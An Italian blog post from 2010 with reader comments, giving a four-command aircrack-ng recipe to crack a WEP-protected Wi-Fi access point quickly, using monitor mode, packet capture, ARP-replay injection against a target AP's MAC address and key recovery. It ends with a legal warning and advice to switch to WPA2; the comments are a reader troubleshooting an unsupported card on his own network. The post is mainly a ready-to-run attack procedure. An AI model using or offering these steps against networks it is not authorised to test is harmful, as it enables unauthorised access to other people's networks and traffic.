Craccare WEP in un minuto

18 dicembre 2010

Sicurezza

Oramai tutti sanno come si cracca un’ access point con crittografia WEP e quindi per non essere uguale agli altri vi spiego il modo per farlo in un minuto! 🙂

Ovviamente utilizzeremo la suite aircrack che risulta essere lo standard de facto del cracking wireless.

Di seguito vi indico i comandi da digitare sul terminale:

  1. sudo airmon-ng start wlan0
  2. sudo airodump-ng –channel 1 -w nome_file mon0
  3. sudo aireplay-ng -h mac_fittizzio -b mac_ap_da_attacare –arpreplay mon0
  4. sudo aircrack-ng -a 1 -b mac_ap_da_attacare nome_file-01.cap

Ora vediamo di capire un pò cosa stiamo facendo..

Con il primo comando stiamo mettendo la nostra scheda wifi in una modalità detta monitor mode, è questa modalità che ci permette di ascoltare il traffico che passa nella zona circostante.

Con il secondo comando stiamo ascoltando il traffico che passa sul canale 1 e scrivendolo sul file nome_file, mon0 è la nostra scheda wireless in monitor mode.

Il terzo comando è quello che ci permette di andare veloci nel crack in quanto genera traffico verso l’ap. (Sarebbe meglio lanciare questo comando da un’altra shell)

Il quarto ed ultimo comando legge il file con tutti i dati passati nella rete e tenta il crack, sapremo la chiave quando troveremo scritto KEY FOUND 😀 (Sarebbe bene lanciare questo comando da un’altra shell contemporaneamente al comando precedente)

La prossima volta vi spiegherò perchè tutto questo è possibile..

P.S. Se avete fatto questa prova avrete sicuramente notato quant’è facile riuscire a connettersi ad una rete con cifratura WEP, vi ricordo che per la legge italiana è reato violare una protezione, per cui non fatelo e sopratutto avvisate tutti quelli che conoscete di passare per lo meno ad una WPA, meglio WPA2.
Nonostante questa falla sia risaputissima voi non avete idea di quanti router WEP ci sono in giro!!

Se ti è stato utile il mio articolo, spendi un secondo del tuo tempo e dammi un +1, Google ed io ne saremmo felici 🙂 Grazie mille 🙂
, ,

9 Responses to “Craccare WEP in un minuto”

  1. Salvatore Says:

    ciao ale,
    io ho una rete protetta da wep e per controllare se fosse veramente cosi insicura ho provato a seguire la tua guida….

    dopo il primo comando (sudo airmon-ng start wlan0)mi dice:

    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    2646 NetworkManager
    2652 wpa_supplicant
    2670 avahi-daemon
    2671 avahi-daemon
    3343 dhclient
    Process with PID 3343 (dhclient) is running on interface eth1

    interface chipset driver

    eth1 unknown wl

    POI faccio il secondo (sudo airodump-ng –channel 1 -w nome_file mon0)comando in questo modo:

    sudo airodump-ng –channel 1 -w prova.txt mon0

    e mi dice:
    Notice: you specified “-channel”.did you mean”–channel”instead?

    ho fatto la prova a scriverlo con –channel e mi ha dato:

    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: no such device
    poichè tu non ti sbagli mai, ho pensato che qualche cosa non fosse andato per il verso giusto….che cosa è successo?

    ciao 😀

  2. predator1987 Says:

    Ciao Salvatore,

    mi mandi per favore il risultato del comando: ‘iwconfig’
    perchè mi sa tanto che la tua scheda non è wlan0..

    Grazie

  3. Salvatore Says:

    ecco a te 😀

    lo no wireless extensions.

    eth0 no wireless extensions.

    eth1 IEEE 802.11 Nickname:””
    Access Point: Not-Associated
    Link Quality:2 Signal level:185 Noise level:161
    Rx invalid nwid:0 invalid crypt:0 invalid misc:0

    pan0 no wireless extensions.

  4. predator1987 Says:

    la tua periferica non si chiama wlan0 ma eth1
    e quindi devi usare eth1 al posto di eth0 😀

  5. Salvatore Says:

    ale scusa se ti ho risposto in ritardo ma non mi visualizzava i nuovi post… anche facendo:

    sudo airmon-ng start eth1

    e succesivamente :

    sudo airodump-ng –channel 1 -w prova.txt eth1

    mi dà:

    ioctl(SIOCSIWMODE) failed: Invalid argument

    ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
    ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
    sure RFMON is enabled: run ‘airmon-ng start eth1 ‘
    Sysfs injection support was not found either.

    FORSE LA MIA SCHEDA NON SUPPORTA LA INJECTION???è una stroscia di BROADCOM…..

  6. predator1987 Says:

    Dopo aver digitato il primo comando se va a buon fine dovresti avere una scheda di rete virtuale chiamata mon0 ed è questa che devi utilizzare con airodump..
    Leggi bene che c’è scritto 🙂

  7. Salvatore Says:

    si ma anche facendo :

    sudo airodump-ng –channel 1 -w file.txt mon0

    mi dà:

    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device

  8. predator1987 Says:

    Mi sa che non ne usciamo più..
    Da quello che hai scritto sembrerebbe che la periferica mon0 non sia stata creata e quindi il problema sarà che non hai i driver che supportano il package injection 🙁
    Il comando airmon da una risposta in output mi dici cosa ti scrive?

  9. Salvatore Says:

    alè scusa se ti rispondo dopo tutto questo tempo ma sono stato senza internet 🙁
    allora se faccio :

    sudo airodump-ng –channel 1 -w prova mon0

    mi dà:

    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device

    se faccio :

    sudo airodump-ng –channel 1 -w prova.txt eth1

    mi dà:

    ioctl(SIOCSIWMODE) failed: Invalid argument

    ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
    ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
    sure RFMON is enabled: run ‘airmon-ng start eth1 ‘
    Sysfs injection support was not found either.

    stessa cosa anche con eth0 🙁 mi sà che anche questa volta(purtroppo) hai ragione tu….ho una scheda di rete da buttare!!!!

    ciao, grazie e scusa per tutto il tempo che ti ho fatto perdere 😀

Leave a Reply

*